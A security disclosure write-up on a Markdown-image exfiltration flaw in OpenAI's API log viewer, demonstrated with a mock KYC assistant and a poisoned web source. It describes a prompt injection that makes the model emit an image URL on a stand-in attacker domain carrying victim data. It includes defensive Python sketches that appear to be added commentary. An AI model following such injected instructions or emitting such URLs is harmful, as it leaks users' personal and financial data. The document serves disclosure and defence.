
OpenAI API Logs: Unpatched data exfiltration


The OpenAI Platform interface has a vulnerability that exposes all AI applications and agents built with OpenAI ‘responses’ and ‘conversations’ APIs to data exfiltration risks due to insecure Markdown image rendering in the API logs. ‘Responses’ is the default API recommended for building AI features (and it supports Agent Builder) — vendors that list OpenAI as a subprocessor are likely using this API, exposing them to the risk. This attack succeeds even when developers have built protections into their applications and agents to prevent Markdown image rendering.

Attacks in this article were responsibly disclosed to OpenAI (via BugCrowd). The report was closed with the status ‘Not applicable’ after four follow-ups (more details in the Responsible Disclosure section). We have chosen to publicize this research to inform OpenAI customers and users of apps built on OpenAI, so they can take precautions and reduce their risk exposure.

Additional findings at the end of the article impact five more surfaces: Agent Builder, Assistant Builder, and Chat Builder preview environments (for testing AI tools being built), the ChatKit Playground, and the Starter ChatKit app, which developers are provided to build upon.

An application or agent is built using the OpenAI Platform

In this attack, we demonstrate a vulnerability in OpenAI's API log viewer. To show how an attack would play out, we created an app with an AI assistant that uses the ‘responses’ API to generate replies to user queries. For this attack chain, we created an AI assistant in a mock Know Your Customer (KYC) tool. KYC tools enable banks to verify customer identities and assess risks, helping prevent financial crimes — this process involves sensitive data (PII and financial data provided by the customer) being processed alongside untrusted data (including data found online) used to validate the customer's attestations.
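To make the setup concrete, here is a minimal sketch of how such a KYC assistant might assemble its model input. The function name `build_kyc_input`, the data sources, and the model name are illustrative assumptions, not details from the article; the key point is that untrusted external content ends up in the same context as trusted customer data.

```python
# Hypothetical sketch: assembling input for a KYC assistant built on the
# 'responses' API. Names and data here are illustrative assumptions.

def build_kyc_input(customer_record: str, external_sources: list[str]) -> list[dict]:
    """Assemble the model input: trusted customer data plus untrusted
    external sources (one of which an attacker may have poisoned)."""
    messages = [
        {"role": "system",
         "content": "You are a KYC review assistant. Summarize risk findings."},
        {"role": "user", "content": f"Customer record:\n{customer_record}"},
    ]
    for src in external_sources:
        # Untrusted scraped content enters the model context here --
        # this is where a prompt injection can ride in.
        messages.append({"role": "user", "content": f"External source:\n{src}"})
    return messages

# With the official openai client, this would be sent roughly as:
#   client.responses.create(model="gpt-4.1", input=build_kyc_input(...))
```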

The user interacts with the AI assistant or agent built using the OpenAI ‘responses’ or ‘conversations’ API

Here, six data sources are pulled in as part of the KYC review process for this customer. One of these data sources contains content scraped from the internet that has been poisoned with a prompt injection.

When the user selects one of the recommended queries, the AI app blocks the data exfiltration attack

In this step, the prompt injection in the untrusted data source manipulates the AI model to output a malicious Markdown image. The image URL is dynamically generated and contains the attacker’s domain with the victim’s data appended to the URL: attacker.com/img.png?data={AI appends victim’s sensitive data here} However, the malicious response is flagged by an LLM-as-a-judge check and blocked, so it is not rendered by the AI app. Note: this attack can occur without an LLM as a judge; more details in Attacking Systems with Alternative Image Defenses.
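An application-side defense like the one described here does not have to be an LLM judge. A deterministic filter that rejects Markdown images pointing at non-allowlisted hosts would catch the same payload. The sketch below is an assumption about how such a filter could look, not the app's actual implementation; the allowlisted host and the sample payload are made up.

```python
import re
from urllib.parse import urlparse

# Minimal sketch of an output filter that blocks Markdown images whose host
# is not on an allowlist -- one way an app can close this exfiltration
# channel without an LLM judge. Host and payload below are illustrative.

MD_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")
ALLOWED_HOSTS = {"cdn.example-kyc-app.com"}  # assumed trusted image host

def blocks_exfiltration(text: str) -> bool:
    """Return True if the model output contains an image URL whose host
    is not allowlisted (e.g. attacker.com with data in the query string)."""
    for m in MD_IMAGE.finditer(text):
        if urlparse(m.group("url")).netloc not in ALLOWED_HOSTS:
            return True
    return False

malicious = "Summary: ![img](https://attacker.com/img.png?data=SSN%20123-45-6789)"
print(blocks_exfiltration(malicious))  # True: image host is not allowlisted
```

A filter like this runs before the response is rendered; anything flagged is dropped or shown as plain text instead of Markdown.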

The flagged conversation is selected for review in the OpenAI platform, which uses Markdown

When investigating the flagged conversation, the first step a developer would likely take is opening the OpenAI API logs and reviewing the conversation. The logs for the OpenAI ‘responses’ and ‘conversations’ APIs are displayed using Markdown formatting.
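This is the crux of the finding: even a blocked payload is fetched the moment a log viewer renders it as Markdown. The safe alternative is to display logged model output verbatim. A minimal sketch, assuming an HTML-based viewer:

```python
import html

# Sketch of a safer log viewer: escape logged model output and show it as
# preformatted text rather than rendering it as Markdown, so a Markdown
# image in a logged response never triggers an outbound image request.

def render_log_entry(model_output: str) -> str:
    """Return HTML that displays the raw response text verbatim."""
    return f"<pre>{html.escape(model_output)}</pre>"

entry = render_log_entry("![img](https://attacker.com/img.png?data=secret)")
# The payload survives only as inert escaped text -- no <img> tag is emitted,
# so the reviewer sees the attack without the browser executing it.
```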
